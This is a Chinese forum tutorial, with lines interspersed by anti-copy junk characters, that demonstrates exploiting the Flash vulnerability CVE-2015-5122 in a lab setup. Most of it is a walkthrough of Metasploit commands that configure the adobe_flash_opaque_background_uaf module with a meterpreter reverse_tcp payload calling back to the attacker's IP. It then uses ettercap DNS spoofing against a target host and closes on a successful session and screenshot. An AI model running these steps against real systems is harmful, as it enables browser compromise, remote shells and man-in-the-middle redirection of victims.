|
$ a2 Q! b3 l# t) q# }
二、cve2015-5122漏洞实例演示虚拟机 4 ~. o! W# i* q9 z& T5 q1 o. p3 R
6 ~" U0 [; W. w; X- L& L- @. j
1 S8 n, D0 K8 k; l* R7 m 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
' s- B5 c+ e0 a. k( R7 `- j/ W- q
) E" q1 X& }1 o9 M. r! K' G
9 Z0 e6 _, C' \- P search cve-2015-5122如图:
2 z5 B6 H4 d' K" R: @ 3 _, y) T# U, x8 w5 R( a* ?( O
% l$ V9 W9 h g( ]- | 6 `# c; |3 h" O! D$ d
+ W1 @/ ^( ?( C: b
% h6 |1 [* T$ T! N' J 下面我们敲如下命令:
, Y2 r$ R+ G+ v' |( [: ^! p
O) |+ X! u* V& L# L) V
# O, w2 p m7 M: ~) \) K5 j use exploit/multi/browser/adobe_flash_opaque_background_uaf $ m& a+ Y7 W# z
. K0 ^$ B K$ I0 i
4 t: Z% @5 c: Q! W; p# D set PAYLOAD windows/meterpreter/reverse_tcp
* H/ @6 Q! e* H) p' w
9 K$ A3 f% e& \/ u# a" ]4 B; F
" Q, h# l" H9 a, T( ~ set LHOST 192.168.0.109 2 H: T6 c5 M# ~ [
9 [2 L7 u9 w9 S* b
5 g: r2 K5 y" R) a+ N1 c7 G+ a set URIPATH / /*根目录*/ 3 _) \( X3 g4 n
3 C3 |/ b+ r; g' |) r4 B- b% {! U+ {0 n) @% O! T. ~, C( i& T
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 3 J4 D8 u2 i/ `! W8 k; t/ p
) X# l, e* F# c5 k" o/ {3 C
+ j: F6 L: B, l- a2 j set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ' d" B/ C D, z" X3 D& b8 W
; U4 ^. P# [3 c- x3 [ o! p7 t) D- x8 B. A7 p
然后show options如图:
! Z0 |- n* Y B8 Y
' N( C) k6 V& c" ?& Y! U
6 q# W& [' o5 N" t/ d, j+ F: o; m. o f ) y- M* N$ @: \: t) v5 }$ j9 a
, N3 p/ j- O5 b; ?. G0 c1 q1 _( e
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
! C$ H+ h: {& L5 l5 y8 S0 E5 t
2 h' p! f3 ~' c' f
2 `' [- I" L7 k' p6 V1 w/ ^9 G! x8 S6 E+ @4 M2 w4 K& R
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
" d& ~4 B9 W, E' u3 P1 J$ |" W , N$ k) r! x. H
; W3 @; {' I- b8 L, C
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf ! O1 [& n* m0 Q1 W B/ \6 r" G
3 _( H7 N6 h0 u: U
/ L v9 L: l! U% Q% k
1 Q" H% T* y$ Q$ T% v1 ~
1 ?1 X, \& V2 k; A: P5 G
`4 _5 K- i4 {" o4 T* Z 成功了,这时候我们断开ettercap,如图: 7 t. U2 \: U) w1 ^' T1 M+ e
& h$ ?. Z5 }! Z; @
' Y) ^- z6 r# P3 r2 J; X4 l
: J, Q. O. d& L9 H% [ 2 B( ]1 Z4 y3 g4 {9 I {2 I
$ Z5 ^; ? {9 y( D: A% C* v4 ^2 C Screenshot如图:
( u/ Y8 ] S( |; ~! g / c( x1 e& q) t; V
( D% {. h' v- g1 R1 C& s/ i
- e" A1 ^! m) A" m* i3 j
% }" }) \# u: s% s: H
; V7 `3 c; o0 J9 |; V- A" B ' j* B: ~' K* _" o) P" N' q
|